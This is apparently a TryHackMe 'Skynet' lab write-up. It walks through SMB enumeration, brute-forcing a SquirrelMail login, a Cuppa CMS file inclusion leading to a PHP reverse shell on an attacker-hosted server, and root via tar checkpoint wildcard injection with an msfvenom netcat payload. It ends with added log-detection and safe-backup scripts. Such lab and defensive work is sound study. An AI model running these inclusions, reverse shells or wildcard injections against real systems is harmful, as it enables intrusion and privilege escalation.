![11d781669cc190c85022ce575ea9c317.png](eeb7aef3c384436db16db340774c188d.png)

### General Enumeration and Initial Findings (Nmap, FFuF, SMBClient)

Starting off, as always, with a basic **nmap** scan:

```
nmap -sC -sV -oN initial -T4 10.10.11.92

Nmap scan report for 10.10.11.92
Host is up (0.21s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP SASL UIDL CAPA PIPELINING AUTH-RESP-CODE RESP-CODES
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imap
|_imap-capabilities: SASL-IR more post-login have IDLE listed capabilities LITERAL+ ENABLE OK ID Pre-login LOGINDISABLEDA0001 IMAP4rev1 LOGIN-REFERRALS
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-06-06T08:26:40-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-06-06T13:26:40
|_  start_date: N/A
```

A few interesting ports:

- **80** - Webserver
- **139** and **445** - SMB
Let's kick around the webserver.

![09111542ab5e4fe417eae608bb3d9ce6.png](f67638bd68c64c66be2a24ee89a619d3.png)

A search engine that does... nothing? Nothing in the source, no robots.txt. Let's see if we can bust some directories with **FFuF** using the [Seclists Common list](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt), matching all response codes and filtering out 404s:

```
ffuf -u http://10.10.219.151/FUZZ -w /common.txt -mc all -fc 404

.htaccess       [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswd       [Status: 403, Size: 276, Words: 20, Lines: 10]
.hta            [Status: 403, Size: 276, Words: 20, Lines: 10]
admin           [Status: 301, Size: 310, Words: 20, Lines: 10]
config          [Status: 301, Size: 311, Words: 20, Lines: 10]
css             [Status: 301, Size: 308, Words: 20, Lines: 10]
index.html      [Status: 200, Size: 523, Words: 26, Lines: 19]
js              [Status: 301, Size: 307, Words: 20, Lines: 10]
server-status   [Status: 403, Size: 276, Words: 20, Lines: 10]
squirrelmail    [Status: 301, Size: 317, Words: 20, Lines: 10]
```

`/admin` and `/config` are **Forbidden**, but how about `/squirrelmail`?

![c6db40ceec26c477840099dbd236348f.png](477bf6243c8b4233b5887814edfea106.png)

A login page. Let's do some more enumeration before trying to crack this. Since **139 and 445** are open, we'll take a look at **SMB** enumeration using **smbclient**:

```
smbclient -L \\\\10.10.219.151\\
```

![498287e0d20d2eea3670b2f90bdeab31.png](6148c1247a63464b941d17f361a458c4.png)

Two interesting shares: **anonymous** and **milesdyson**.

```
smbclient \\\\10.10.219.151\\anonymous
```

![009c382c71b90ed99b349d5089e15455.png](a73af5beb865470f9c26a1039748f350.png)

Grab **attention.txt** with `get attention.txt`:

```
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.

-Miles Dyson
```

**logs** is a directory with three files; only one has data.

![0e7c0bef3b482b771c9283cffef5146d.png](8189129d8ce848ab9697ba8f37611165.png)

Grab **log1.txt** with `get log1.txt`:

```
cyborg007haloterminator
terminator22596
terminator219
.
.
79terminator6
1996terminator
```

Passwords, maybe? Let's go back to `/squirrelmail` and see if any of these work. We saw that there was a `milesdyson` share, so maybe that's a username? Let's use **FFuF** again, but this time to brute-force the login form. Capture the login request in Burp to build the command.

![a8bfdd866447114bbaef1e6ca0b0787c.png](035d57d03a93402abda27e27968f9071.png)

```
ffuf -u http://10.10.219.151/squirrelmail/src/redirect.php -d "login_username=milesdyson&secretkey=FUZZ&js_autodetect_results=1&just_logged_in=1" -H "Content-type: application/x-www-form-urlencoded" -w log1.txt
```

```
cyborg007haloterminator [Status: 302, Size: 0, Words: 1, Lines: 1]
```

Got a 302 redirect, which means this is likely our password. Log in!

![df812a90f23950cf03a19de8ebe9add6.png](ab2e7ef8c7fa449c8b429bc6587ff5ef.png)

Interesting.

![3f1a6fcd298bb004bcc28b3a99c7bf46.png](3de6bf80d5454cc38e06620dbb655844.png)

**SMB** password?! Maybe we can access the **milesdyson** share now!

![eded2e8b9d5d4953dc90e4cbc0a79e01.png](f48510b5a6584f9d86cbd38af70f4cf9.png)

`cd notes`
`ls`

![4def45ee023a5454df8b4cd48478aef8.png](2026bb393c0e450db714388009f11efa.png)

Grab **important.txt** with `get important.txt`:

```
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
```

New endpoint!
`/45kra24zxs28v3yd`

---

### Access (Cuppa CMS, Remote File Inclusion, FFuF)

![bc63f6fc92f24bf3d9fedfd0903a63d7.png](719480253e204f42812dae240f028204.png)

Running **FFuF** against the new directory using the [Seclists Common list](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt), matching all response codes and filtering out 404s:

```
.htaccess       [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswd       [Status: 403, Size: 276, Words: 20, Lines: 10]
.hta            [Status: 403, Size: 276, Words: 20, Lines: 10]
administrator   [Status: 301, Size: 335, Words: 20, Lines: 10]
index.html      [Status: 200, Size: 418, Words: 45, Lines: 16]
```

`/administrator` is **Cuppa CMS**.

![27be8fa7976ad437e60e0762e3d826d7.png](1c4a6123ca2047bebb0b197bbd94e9c2.png)

Looks like there's an LFI/RFI [exploit](https://www.exploit-db.com/exploits/25971) for **Cuppa CMS**. Using the PoC to make sure it's vulnerable:

```
http://10.10.11.92/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
```

Decoded:

```
<?php
	class Configuration{
		public $host = "localhost";
		public $db = "cuppa";
		public $user = "root";
		public $password = "password123";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "";
		public $secure_login_redirect = "";
	}
```

So we have LFI; let's try RFI using [php-reverse-shell.php]() from pentestmonkey.

1. Edit the relevant values (IP and PORT)
2. Host it on a webserver - `python3 -m http.server`
3. Start a listener - `nc -lvnp 4444`
4. Include your URL - `alerts/alertConfigField.php?urlConfig=http://IP:PORT/php-reverse-shell.php`
5. Send it!

![b1ce298faa6253cc9b9dd1fc49c1dbbf.png](d87fad90ec774c50b03d71cb2d0c0624.png)

---

### Privesc (tar checkpoints, Wildcard Injection, msfvenom)

Password reuse! Using `cyborg007haloterminator` we can switch to the `milesdyson` user. There's an interesting script in `/home/milesdyson/backups` called `backup.sh`:

```
milesdyson@skynet:~/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
```

Let's check if it's running as a **cronjob**:

```
cat /etc/crontab
# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
```

So every minute root runs the script, which changes to the `/var/www/html` directory and runs `tar cf` on everything in it. `milesdyson` doesn't have write access to `/var/www/html`, but if we drop back down to `www-data` we do! Since **tar** is run on a shell **wildcard**, it's vulnerable to argument injection: the shell expands `*` into the filenames in the directory, and filenames that look like `tar` checkpoint options are parsed as options:

```
--checkpoint=1
--checkpoint-action=exec=sh shell.sh
```

Create a reverse shell using **msfvenom** and start a listener:

```
msfvenom -p cmd/unix/reverse_netcat lhost=IP lport=PORT R
nc -lvnp PORT
```

```
echo 'SHELLOUTPUT' > shell.sh
touch -- "--checkpoint-action=exec=sh shell.sh"
touch -- --checkpoint=1
```

Notice the `--` before the file name: it tells `touch` to stop option parsing, which is what lets us create filenames that begin with `-`. Now we wait...
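From the defender's side, both the SquirrelMail password guessing and the Cuppa CMS `urlConfig` inclusion above leave a clear trace in the Apache access log. The script below is an added example, not part of the original writeup or of either project: two checks over combined-format log lines, one counting POSTs to the login handler per client and one flagging `urlConfig` values that carry a `php://` wrapper or a remote URL scheme. The log lines in `demo()` are constructed; the request paths are the ones from the writeup.

```shell
#!/bin/sh
# Added example, not part of the original writeup: two log checks a defender
# could run over Apache combined-format access logs to surface the activity
# shown above: the FFuF password guessing against SquirrelMail and the Cuppa
# CMS urlConfig file inclusion. Log lines in demo() are constructed; the paths
# /squirrelmail/src/redirect.php and alerts/alertConfigField.php?urlConfig=
# are the ones from the writeup.

# login_spray LOGFILE [THRESHOLD]
# Count POST requests to the SquirrelMail login handler per client address and
# print "ip count" for every client at or above THRESHOLD (default 10).
# In combined format $1 is the client IP, $6 is "\"METHOD" and $7 the path.
login_spray() {
    log="$1"
    threshold="${2:-10}"
    awk -v t="$threshold" '
        $6 == "\"POST" && $7 ~ /^\/squirrelmail\/src\/redirect\.php/ { n[$1]++ }
        END { for (ip in n) if (n[ip] >= t) print ip, n[ip] }
    ' "$log"
}

# include_abuse LOGFILE
# Print "ip path" for any request whose urlConfig parameter carries a php://
# stream wrapper or a remote URL scheme, the two shapes of include abuse above.
include_abuse() {
    log="$1"
    awk '$7 ~ /alertConfigField\.php\?urlConfig=(php:\/\/|https?:\/\/|ftp:\/\/)/ { print $1, $7 }' "$log"
}

# Self-contained demo on constructed log lines written to a temporary file.
demo() {
    log=$(mktemp)
    cat > "$log" <<'EOF'
10.9.0.5 - - [06/Jun/2021:08:30:01 -0500] "POST /squirrelmail/src/redirect.php HTTP/1.1" 200 1532 "-" "ffuf/1.3"
10.9.0.5 - - [06/Jun/2021:08:30:01 -0500] "POST /squirrelmail/src/redirect.php HTTP/1.1" 200 1532 "-" "ffuf/1.3"
10.9.0.5 - - [06/Jun/2021:08:30:02 -0500] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "ffuf/1.3"
10.9.0.7 - - [06/Jun/2021:08:31:10 -0500] "GET /index.html HTTP/1.1" 200 523 "-" "Mozilla/5.0"
10.9.0.5 - - [06/Jun/2021:08:35:44 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.9.0.5 - - [06/Jun/2021:08:36:02 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.0.5:8000/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
EOF
    echo "== clients with 3 or more login POSTs =="
    login_spray "$log" 3
    echo "== suspicious urlConfig values =="
    include_abuse "$log"
    rm -f "$log"
}

demo
```

The 302 on the third POST is the same signal the writeup used to spot the valid password, so a rule that alerts on a burst of POSTs followed by one redirect, rather than on the count alone, separates a successful guess from a failed spray. On the inclusion side, any `urlConfig` that is not a bare relative filename is worth an alert, since the legitimate parameter never needs a scheme.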
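The root cause in `backup.sh` is the unquoted `*`, which lets the shell hand file names to `tar` as if they were arguments. As an added example that is not part of the original writeup, the script below shows the wildcard-free form of the same backup (a fixed path via `-C` and `.` as the only member argument) next to a small check that lists entries whose names begin with `-`, which is what a defender would want cron or a file-integrity job to flag on a web root. It assumes POSIX sh with `tar`, `find` and `mktemp`; the directory layout in `demo()` is constructed.

```shell
#!/bin/sh
# Added example, not part of the original writeup: the wildcard-free form of
# the backup command from backup.sh above, plus a check that reports files
# whose names would be parsed as tar options if a wildcard ever handed them to
# tar. Assumes POSIX sh with tar, find and mktemp; the directory layout in
# demo() is constructed.

# safe_backup SRC_DIR DEST_ARCHIVE
# tar gets a fixed path via -C and archives "." instead of a shell-expanded
# "*", so a file called --checkpoint=1 is just an entry named ./--checkpoint=1
# and never reaches tar's option parser.
safe_backup() {
    tar -cf "$2" -C "$1" .
}

# find_option_like_names DIR
# List entries directly under DIR whose names begin with "-", the shape an
# attacker needs for wildcard argument injection. Returns 1 if any were found
# so it can be used from cron or a monitoring script.
find_option_like_names() {
    found=$(find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print)
    [ -z "$found" ] && return 0
    printf '%s\n' "$found"
    return 1
}

# Demo on a constructed web root in a temporary directory.
demo() {
    work=$(mktemp -d)
    mkdir "$work/html"
    echo '<html></html>' > "$work/html/index.html"
    echo 'echo this must never run' > "$work/html/shell.sh"
    # Constructed option-like names of the kind shown in the writeup.
    touch -- "$work/html/--checkpoint=1"
    touch -- "$work/html/--checkpoint-action=exec=sh shell.sh"

    echo "== option-like names under $work/html =="
    find_option_like_names "$work/html" || echo "(review these before any wildcard runs here)"

    safe_backup "$work/html" "$work/backup.tar"
    echo "== archive contents (names archived, nothing executed) =="
    tar -tf "$work/backup.tar"
    rm -rf "$work"
}

demo
```

Running it shows the two odd names reported by the check and then listed as ordinary `./--checkpoint...` entries in the archive; `shell.sh` is archived, not run. The other half of the fix is the cron entry itself: a root job should not execute a script that lives in a user's home directory, since anyone who can write to `/home/milesdyson/backups/backup.sh` gets the same result without touching `tar` at all.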
![cce8dd0eb08937389abf8fba3541f152.png](690a70cf6d284646a0c796cb9a8f4cf7.png)

---

Back to [[TryHackMe Index]]

Tags: #thm #tryhackme #box_writeups #cuppa #rfi #smb #wildcard_injection #tar #cron #smbclient #ffuf #bruteforce #msfvenom